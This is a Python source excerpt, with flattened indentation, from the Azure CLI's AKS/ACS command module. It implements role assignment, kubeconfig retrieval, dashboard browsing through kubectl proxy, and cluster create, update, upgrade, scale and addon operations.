# the next breaking change window.
# legacy: acs create
def _create_role_assignment(cmd, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import get_sdk
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
    # If the cluster has a service principal, resolve the service principal client ID to get the
    # object ID; otherwise use the MSI object ID.
object_id = assignee
if resolve_assignee:
from azure.graphrbac.models import GraphErrorException
error_msg = "Failed to resolve service principal object ID: "
try:
object_id = _resolve_object_id(cmd.cli_ctx, assignee)
except GraphErrorException as ex:
if ex.response is not None:
error_code = getattr(ex.response, "status_code", None)
error_reason = getattr(ex.response, "reason", None)
internal_error = ""
if error_code:
internal_error += str(error_code)
if error_reason:
if internal_error:
internal_error += " - "
internal_error += str(error_reason)
if internal_error:
error_msg += "({}) ".format(internal_error)
error_msg += ex.message
# this should be UserFault or ServiceError, but it is meaningless to distinguish them here
raise CLIError(error_msg)
        except Exception as ex:  # pylint: disable=broad-except
raise CLIError(error_msg + str(ex))
assignment_name = uuid.uuid4()
custom_headers = None
RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
RoleAssignmentProperties = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentProperties', mod='models',
operation_group='role_assignments')
properties = RoleAssignmentProperties(role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, properties, custom_headers=custom_headers)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
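# Illustrative sketch (added for clarity; a hypothetical helper with a placeholder
# subscription ID): the three outcomes of _build_role_scope. Note that passing both a
# resource group and an explicit scope raises CLIError.
def _example_role_scopes():
    sub_id = '00000000-0000-0000-0000-000000000000'
    subscription_scope = _build_role_scope(None, None, sub_id)    # '/subscriptions/<sub_id>'
    rg_scope = _build_role_scope('my-rg', None, sub_id)           # '.../resourceGroups/my-rg'
    explicit_scope = _build_role_scope(None, '/subscriptions/{}/resourceGroups/other'.format(sub_id), sub_id)
    return subscription_scope, rg_scope, explicit_scope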
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
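# Illustrative sketch (added for clarity; the stub client and GUID below are
# hypothetical): _resolve_role_id passes a GUID through untouched and only queries the
# definitions client when given a role name.
def _example_resolve_role_id():
    from types import SimpleNamespace

    class _StubDefinitionsClient:
        def list(self, scope, filter_string):  # mimics the (scope, filter) call used above
            return [SimpleNamespace(id=scope + '/providers/Microsoft.Authorization/roleDefinitions/abc')]

    guid = '00000000-0000-0000-0000-000000000000'
    stub = _StubDefinitionsClient()
    assert _resolve_role_id(guid, '/subscriptions/sub', stub) == guid
    return _resolve_role_id('Contributor', '/subscriptions/sub', stub)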
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs create
def _get_object_stubs(graph_client, assignees):
from azure.graphrbac.models import GetObjectsParameters
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes get-credentials
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(
name, acs_info, path, ssh_key_file, overwrite_existing)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes browse/get-credentials
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(
path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning(
'Failed to merge credentials to kube config file: %s', exc)
logger.warning(
'The credentials have been saved to %s', path_candidate)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs kubernetes browse/get-credentials
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
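# Note (added for clarity): on Python 3 the same effect can be had with
# os.makedirs(path, exist_ok=True); the EAFP helper above follows the linked recipe.
# Hypothetical usage sketch, never called by the module:
def _example_mkdir_p(tmp_dir):
    _mkdir_p(os.path.join(tmp_dir, 'a', 'b'))   # creates intermediate directories
    _mkdir_p(os.path.join(tmp_dir, 'a', 'b'))   # second call is a no-op, not an error
    return os.path.isdir(os.path.join(tmp_dir, 'a', 'b'))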
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs list
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs list-locations
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
# TODO: deprecated, will remove this after container service commands (acs) are removed during
# the next breaking change window.
# legacy: acs scale
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=disable_browser,
listen_address=listen_address,
listen_port=listen_port,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=resource_type,
operation_group='managed_clusters')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
return_msg = None
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
return_msg = "Kubernetes resources view on {}".format(dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return return_msg
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise FileOperationError('Can not find kubectl executable in PATH')
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--output",
"name",
"--selector",
"k8s-app=kubernetes-dashboard",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard pod: {} Command output: {}'.format(err, err.output))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise ResourceNotFoundError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--selector",
"k8s-app=kubernetes-dashboard",
"--output",
"jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
# output format: "'{port}'"
dashboard_port = int((dashboard_port.replace("'", "")))
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard port: {} Command output: {}'.format(err, err.output))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post(
"http://localhost:8888/openLink/{0}".format(term_id),
json={"url": dashboardURL},
)
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
timeout = None
test_hook_data = get_cmd_test_hook_data("test_aks_browse_legacy.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("enableTimeout", False):
timeout = test_configs.get("timeoutInterval", None)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(
[
"kubectl",
"--kubeconfig",
browse_path,
"proxy",
"--address",
listen_address,
"--port",
listen_port,
],
universal_newlines=True,
stderr=subprocess.STDOUT,
timeout=timeout,
)
except subprocess.CalledProcessError as err:
                if err.output.find('unknown flag: --address') != -1:
return_msg = "Test Invalid Address! "
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
try:
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port], timeout=timeout)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except subprocess.CalledProcessError as new_err:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
new_err, new_err.output
)
)
else:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
err, err.output
)
)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
finally:
os.close(fd)
return return_msg
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
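# Note (added for clarity): shutil.which() in the standard library provides the same
# PATH lookup on Python 3.3+; the local helper is kept as-is here. Hypothetical usage
# sketch, never called by the module:
def _example_which():
    kubectl_path = which('kubectl')
    # Returns the full path of the first matching executable, or None if kubectl is
    # not on PATH (on Windows the '.exe' suffix is appended automatically).
    return kubectl_path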
def wait_then_open(url):
"""
    Waits for a bit then opens a URL. Useful for waiting for a proxy to come up and then opening the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
        except URLError:
            time.sleep(1)
            continue
        break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
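# Illustrative sketch (added for clarity; hypothetical, never called by the module):
# wait_then_open_async is fire-and-forget. The daemon thread waits for the proxy URL to
# answer and then opens the browser tab, while the caller continues into the blocking
# "kubectl proxy" subprocess, which is how _aks_browse above uses it.
def _example_wait_then_open_async():
    wait_then_open_async('http://127.0.0.1:8001/')
    # ... the caller would now start the long-running proxy process ...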
# pylint: disable=too-many-locals
def aks_create(
cmd,
client,
resource_group_name,
name,
ssh_key_value,
location=None,
kubernetes_version="",
tags=None,
dns_name_prefix=None,
node_osdisk_diskencryptionset_id=None,
disable_local_accounts=False,
disable_rbac=None,
edge_zone=None,
admin_username="azureuser",
generate_ssh_keys=False,
no_ssh_key=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
network_plugin=None,
network_policy=None,
auto_upgrade_channel=None,
cluster_autoscaler_profile=None,
uptime_sla=False,
fqdn_subdomain=None,
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
disable_public_fqdn=False,
service_principal=None,
client_secret=None,
enable_managed_identity=True,
assign_identity=None,
assign_kubelet_identity=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
attach_acr=None,
skip_subnet_role_assignment=False,
node_resource_group=None,
enable_defender=False,
defender_config=None,
# addons
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
    # nodepool parameters
nodepool_name="nodepool1",
node_vm_size=None,
os_sku=None,
snapshot_id=None,
vnet_subnet_id=None,
pod_subnet_id=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
enable_cluster_autoscaler=False,
min_count=None,
max_count=None,
node_count=3,
nodepool_tags=None,
nodepool_labels=None,
node_osdisk_type=None,
node_osdisk_size=0,
vm_set_type=None,
zones=None,
ppg=None,
max_pods=0,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
enable_fips_image=False,
kubelet_config=None,
linux_os_config=None,
no_wait=False,
yes=False,
aks_custom_headers=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from azure.cli.command_modules.acs.managed_cluster_decorator import AKSManagedClusterCreateDecorator
aks_create_decorator = AKSManagedClusterCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_profile_default()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc(mc)
def aks_update(
cmd,
client,
resource_group_name,
name,
tags=None,
disable_local_accounts=False,
enable_local_accounts=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
auto_upgrade_channel=None,
cluster_autoscaler_profile=None,
uptime_sla=False,
no_uptime_sla=False,
api_server_authorized_ip_ranges=None,
enable_public_fqdn=False,
disable_public_fqdn=False,
enable_managed_identity=False,
assign_identity=None,
assign_kubelet_identity=None,
enable_aad=False,
enable_azure_rbac=False,
disable_azure_rbac=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
windows_admin_password=None,
enable_ahub=False,
disable_ahub=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
attach_acr=None,
detach_acr=None,
enable_defender=False,
disable_defender=False,
defender_config=None,
# addons
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
    # nodepool parameters
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None,
max_count=None,
nodepool_labels=None,
no_wait=False,
yes=False,
aks_custom_headers=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from azure.cli.command_modules.acs.managed_cluster_decorator import AKSManagedClusterUpdateDecorator
aks_update_decorator = AKSManagedClusterUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_profile_default()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc(mc)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade the node image version. '
                       'If you only want to upgrade the node image version, please use the "--node-image-only" option.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
        # This only provides convenience for customers on the client side so they can run "az aks upgrade"
        # to upgrade all nodepools of a cluster. The SDK only supports upgrading a single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. The node image upgrade '
                               'operation can only be applied to VirtualMachineScaleSets clusters.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client,
resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name,
snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(
no_wait,
client.begin_upgrade_node_image_version,
resource_group_name,
cluster_name,
nodepool_name,
headers=headers)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the nodepool name, or use the "az aks nodepool" command to scale a node pool.')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior: these fields are not sent
    by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
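# Illustrative sketch (added for clarity; the SimpleNamespace objects below are
# hypothetical stand-ins for SDK models, not real ManagedCluster instances):
def _example_remove_nulls():
    from types import SimpleNamespace
    mc = SimpleNamespace(
        tags=None,
        agent_pool_profiles=[SimpleNamespace(os_disk_size_gb=None, vnet_subnet_id='subnet-id')],
        service_principal_profile=SimpleNamespace(secret=None),
    )
    cleaned = _remove_nulls([mc])[0]
    # 'tags', the pool's 'os_disk_size_gb' and the SP 'secret' were None, so they are
    # removed; populated fields such as 'vnet_subnet_id' are kept.
    return not hasattr(cleaned, 'tags') and hasattr(cleaned.agent_pool_profiles[0], 'vnet_subnet_id')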
# pylint: disable=line-too-long
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
# pylint: disable=line-too-long
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False,
enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
msi_auth = False
if instance.service_principal_profile.client_id == "msi":
msi_auth = True
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation,
rotation_poll_interval=rotation_poll_interval,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if msi_auth:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
aad_route=True,
create_dcr=True,
create_dcra=True)
else:
raise ArgumentUsageError(
"--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
